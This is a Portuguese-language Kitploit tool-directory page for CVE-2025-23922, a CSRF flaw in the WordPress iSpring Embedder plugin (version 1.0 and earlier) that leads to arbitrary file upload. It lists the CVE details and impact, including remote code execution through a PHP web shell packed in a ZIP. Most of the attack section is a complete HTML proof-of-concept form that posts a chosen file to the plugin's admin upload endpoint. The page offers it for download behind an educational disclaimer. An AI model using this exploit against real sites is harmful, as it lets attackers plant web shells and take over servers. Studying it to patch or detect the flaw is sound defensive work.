Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-23922 — WordPress iSpring Embedder plugin <= 1.0 - Vulnerabilidade de CSRF para Upload Arbitrário de Arquivos | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-23922
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubnxploited/cve-2025-23922

CVE-2025-23922

WordPress iSpring Embedder plugin <= 1.0 - Vulnerabilidade de CSRF para Upload Arbitrário de Arquivos

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-23922 - WordPress iSpring Embedder CSRF para Upload Arbitrário de Arquivos

📌 Detalhes do CVE

  • ID do CVE: CVE-2025-23922
  • Publicado em: 2025-01-16
  • Plugin Afetado: Plugin WordPress iSpring Embedder
  • Versões Afetadas: <= 1.0
  • Autor do Plugin: Harsh
  • Tipo de Vulnerabilidade: Cross-Site Request Forgery (CSRF) → Upload Arbitrário de Arquivos
  • ID CWE: CWE-352: Cross-Site Request Forgery (CSRF)
  • Pontuação CVSS: 10.0 (Crítico)
  • Vetor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

🔥 Descrição

Uma vulnerabilidade CSRF no plugin iSpring Embedder para WordPress permite que um atacante remoto não autenticado engane um administrador autenticado para fazer upload de arquivos arbitrários (como um web shell PHP) para o servidor.

O endpoint vulnerável não implementa nenhuma proteção CSRF, e a funcionalidade de upload de arquivos aceita arquivos .zip, que são extraídos para o seguinte local:

root@kitploit:~
/wp-content/uploads/iSpring_embedder/

💡 Impacto

Um atacante pode:

  • Disparar uploads de arquivos sem autenticação.
  • Obter execução remota de código (RCE) ao enviar um arquivo PHP malicioso dentro de um arquivo ZIP.
  • Comprometer todo o servidor web encadeando isso com um web shell personalizado.

🚀 Prova de Conceito (PoC) Exploit (HTML)

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>CSRF File Upload Exploit</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f4f4;
      padding: 20px;
    }
    .container {
      background: #fff;
      padding: 25px;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      max-width: 600px;
      margin: auto;
    }
    h1 {
      color: #d9534f;
    }
    input[type="file"],
    input[type="submit"] {
      margin-top: 10px;
      padding: 10px;
      font-size: 16px;
    }
    .footer {
      margin-top: 30px;
      font-size: 14px;
      color: #777;
      text-align: center;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>CSRF Exploit – File Upload</h1>

    <p>
      This is a proof-of-concept (PoC) exploit for the following vulnerability:
    </p>
    <ul>
      <li><strong>Vulnerability:</strong> CSRF leading to Arbitrary File Upload</li>
      <li><strong>Plugin:</strong> iSpring Embedder for WordPress (<= v1.0)</li>
      <li><strong>CVE:</strong> CVE-2025-23922</li>
      <li><strong>Impact:</strong> Remote attackers can coerce an authenticated administrator to upload arbitrary files, potentially including web shells.</li>
      <li><strong>Upload Path:</strong> <code>/wp-content/uploads/iSpring_embedder/</code></li>
    </ul>

    <form id="csrfForm" action="http://wordpresssite/wp-admin/admin.php?page=ispring-embedder" method="POST" enctype="multipart/form-data">
      <label><strong>Select ZIP file to upload:</strong></label><br>
      <input type="file" name="zip_file" required><br>
      <input type="hidden" name="file_name" value="exploit_csrf">
      <input type="submit" name="submit_ispring_form" value="Upload File via CSRF">
    </form>

    <div class="footer">
      <p>
        Exploit for <strong>CSRF to Arbitrary File Upload vulnerability</strong><br>
        <strong>CVE-2025-23922</strong><br>
        Developed by <strong>Nxploit | Khaled Alenazi</strong>
      </p>
    </div>
  </div>
</body>
</html>



⚠️ Aviso Legal

Esta prova de conceito é fornecida apenas para fins educacionais e de pesquisa.
O autor não é responsável por qualquer uso indevido ou dano causado por este exploit.

Nxploit | Khaled Alenazi
Pesquisador de Segurança e Desenvolvedor de Exploits
https://github.com/Nxploit

Baixar ferramenta